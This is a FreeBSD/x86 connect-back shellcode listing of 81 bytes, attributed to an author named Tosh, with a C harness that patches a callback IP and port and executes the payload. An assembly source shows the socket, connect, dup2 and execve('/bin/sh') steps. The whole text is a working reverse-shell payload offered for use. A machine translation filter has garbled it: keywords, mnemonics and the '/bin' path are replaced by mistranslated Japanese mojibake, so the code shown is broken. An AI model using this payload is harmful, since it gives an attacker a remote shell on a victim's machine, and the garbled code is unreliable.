FreeBSD/x86 - - connect »Ù±ç¤¹¤ë /ÃùÂ¢½ê/sh. 81 bytes

¤³¤Î¥Ú¡¼¥¸¤ÏEtoJÃà¸ìËÝÌõ¥Õ¥£¥ë¥¿¤Ë¤è¤Ã¤ÆËÝÌõÀ¸À®¤µ¤ì¤Þ¤·¤¿¡£
/*
 -------------- FreeBSD/x86 - connect »Ù±ç¤¹¤ë /ÃùÂ¢½ê/sh. 81 bytes ----------------
 *  AUTHOR : Tosh
 *   OS    : BSDx86 (¼Â¸³¡Ê¤¹¤ë¡Ëd on FreeBSD 8.1)
 *   EMAIL : tosh@tuxfamily.org
 */

#´Þ¤à <stdio.h>
#´Þ¤à <string.h>
#´Þ¤à <arpa/inet.h>

char shellcode [] = "\x31\xc0\x50\x6a\x01\x6a\x02\xb0\x61\x50\xcd\x80\x89\xc2"
                    "\x68\x7f\x00\x00\x01\x66\x68\x05\x39\x66\x68\x01\x02\x89"
                    "\xe1\x6a\x10\x51\x52\x31\xc0\xb0\x62\x50\xcd\x80\x31\xc9"
                    "\x51\x52\x31\xc0\xb0\x5a\x50\xcd\x80\xfe\xc1\x80\xf9\x03"
                    "\x75\xf0\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
                    "\x6e\x89\xe3\x50\x54\x53\xb0\x3b\x50\xcd\x80";

Ìµ¸ú¤Î change_shellcode(const char *ip, unsigned short port)
{
   *((unsigned long*)(shellcode + 15)) = inet_addr(ip);
   *((unsigned short*)(shellcode + 21)) = htons(port);
}
Ìµ¸ú¤Î print_shellcode(Ìµ¸ú¤Î)
{
   int i;
   for(i = 0; i < sizeof(shellcode) - 1; i++)
   {
      printf("\\x%.2x", (unsigned char)shellcode[i]);
   }
   printf("\n");
}
int main(Ìµ¸ú¤Î)
{
   const char ip[] = "127.0.0.1";
   unsigned short port = 1337;

   change_shellcode(ip, port);
   print_shellcode();
   printf("Shellcode len = %d bytes\n", sizeof(shellcode)-1);
   Ìµ¸ú¤Î (*f)() = (Ìµ¸ú¤Î*) shellcode;

   f();

   return 0;
}

/*
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Syscalls nums, on /usr/src/sys/kern/syscalls.master ;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

%define IPPROTO_TCP 6
%define SOCK_STREAM 1
%define AF_INET 2

%define SYS_EXECV 59
%define SYS_DUP2 90
%define SYS_SOCKET 97
%define SYS_CONNECT 98

section .text

Á´À¤³¦¤Î _start

_start:
   xor eax, eax
   ;;;;;;;;;;;;;;;;;;;;;;
   ; socket()
   ;;;;;;;;;;;;;;;;;;;;;;
   ²¡¤·¿Ê¤á¤ë eax
   ²¡¤·¿Ê¤á¤ë byte SOCK_STREAM
   ²¡¤·¿Ê¤á¤ë byte AF_INET

   mov al, SYS_SOCKET
   ²¡¤·¿Ê¤á¤ë eax
   int 0x80
   mov edx, eax

   ;;;;;;;;;;;;;;;;;;;;;;
   ; sockaddr_in
   ;;;;;;;;;;;;;;;;;;;;;;
   ²¡¤·¿Ê¤á¤ë 0x0100007f
   ²¡¤·¿Ê¤á¤ë word 0x3905
   ²¡¤·¿Ê¤á¤ë word 0x0201
   mov ecx, esp

   ;;;;;;;;;;;;;;;;;;;;;
   ; connect()
   ;;;;;;;;;;;;;;;;;;;;;
   ²¡¤·¿Ê¤á¤ë byte 16
   ²¡¤·¿Ê¤á¤ë ecx
   ²¡¤·¿Ê¤á¤ë edx
   xor eax, eax
   mov al, SYS_CONNECT
   ²¡¤·¿Ê¤á¤ë eax
   int 0x80

   ;;;;;;;;;;;;;;;;;;;;;
   ; dup2()
   ;;;;;;;;;;;;;;;;;;;;;
   xor ecx, ecx
.L:
   ²¡¤·¿Ê¤á¤ë ecx
   ²¡¤·¿Ê¤á¤ë edx
   xor eax, eax
   mov al, SYS_DUP2
   ²¡¤·¿Ê¤á¤ë eax
   int 0x80

   inc cl
   cmp cl, 3
   jne .L

   ;;;;;;;;;;;;;;;;;;;;;;
   ; execv("/ÃùÂ¢½ê/sh")
   ;;;;;;;;;;;;;;;;;;;;;;
   xor eax, eax

   ²¡¤·¿Ê¤á¤ë eax

   ²¡¤·¿Ê¤á¤ë '//sh'
   ²¡¤·¿Ê¤á¤ë '/ÃùÂ¢½ê'

   mov ebx, esp

   ²¡¤·¿Ê¤á¤ë eax
   ²¡¤·¿Ê¤á¤ë esp
   ²¡¤·¿Ê¤á¤ë ebx
   mov al, SYS_EXECV
   ²¡¤·¿Ê¤á¤ë eax
   int 0x80
 */